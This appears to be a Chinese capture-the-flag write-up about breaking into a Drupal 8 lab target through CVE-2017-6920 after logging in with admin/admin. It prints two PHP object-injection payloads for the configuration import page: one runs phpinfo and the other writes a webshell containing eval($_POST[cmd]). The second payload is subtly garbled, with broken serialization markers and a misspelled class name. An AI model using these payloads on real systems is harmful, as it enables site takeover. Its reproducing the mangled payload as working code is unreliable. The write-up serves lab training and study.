By

Contents
  1. 1. 0x01:任务目标
  2. 2. 0x02:题目分析
  3. 3. 0x03:致谢

西普杯铁人三项赛,训练营企业赛真题drupal渗透。
铁三全是CVE的洞,真给劲。
测试了大半下午,实验环境的菜刀是废的,不妨碍验证是否成功拿下webshell

0x01:任务目标

images
可以看到只是让我们拿webshell,没有涉及提权和内网渗透

0x02:题目分析

从题目中就可以看出,这次的靶机web用的drupal搭建,搜一下在网上drupal爆出的漏洞

可以发现drupal爆出了两个漏洞

  • Drupal SQL注入漏洞(CVE-2014-3704)[7.31-7.x]
  • Drupal 远程代码执行漏洞分析(CVE-2017-6920)[8.x]

这里思路就是看影响版本,更符合哪个,但是我们在这个cms里面看不到任何的版本信息,这种情况下只能逐个尝试,另外由于是综合渗透环境,除了纯web这块,也可以尝试下去用别的思路渗透进去

首先打开网站
发现右上角有Login连接,点击登录
images
尝试账号admin密码admin登陆成功
images
按照CVE-2017-6920的思路访问

http://192.168.1.3/admin/config/development/configuration/single/import

打开如下页面,并设置Configuration type为Simple configuration
任意输入Configuration name内容,在Paste your Configuration here框中输入如下payload

!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\
FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\
"phpinfo\";}"

images
点击import提交
效果如下
images
在phpinfo页面搜索DOCUMNET_ROOT找到web根目录
images

/var/www/html/drupal8/

构造如下payload,写入webshell

!php/object "0:31":\"GuzzleHttp\\Cookie\\FileCookieJar\":4:{s:41:\"\0GuzzleHttp\\
Cookie\\FileCookieJar\0filename\";s:31\"/var/www/html/drupal8/shell.php\";s:52:\"\
0GuzzleHttp\\Cookie\\FileCookieJar\0storeSessionCookies\";b:0;s:36:\
"\0GuzzHttp\\Cookie\CookieJar\0cookies\";a:1:{i:0;0:27:\"GuzzleHttp\\Cookie\\
SetCookie\":1:{s:33:\"\0GuzzleHttp\\Cookie\SetCookie\0data\";a:10:{s:4:\"Name\
";s:4:\"123a\";s:5:\"Value\";s:1:\"0\";s:6:\"Domain\";s:1:\"a\";s:4:\"Path\";s
:1:\"a\";s:7:\"Max-Age\";N;s:7:\"Expires\";i:123456;s:6:\"Secure\";b:0;s:7:\"
Discard\";b:0;s:8:\"HttpOnly\";b:0;s:1:\"a\";s:25:\"<?php eval($_POST[cmd])?>\";}}}
s:39:\"\0GuzzleHttp\Cookie\\CookieJar\0strictMode\";N;}""

点击import即可看到web根目录下写入了shell.php木马文件密码cmd
用菜刀连接即可

images

ps:
payload在实验工具文件夹下

0x03:致谢

https://paper.seebug.org/334/
Contents
  1. 1. 0x01:任务目标
  2. 2. 0x02:题目分析
  3. 3. 0x03:致谢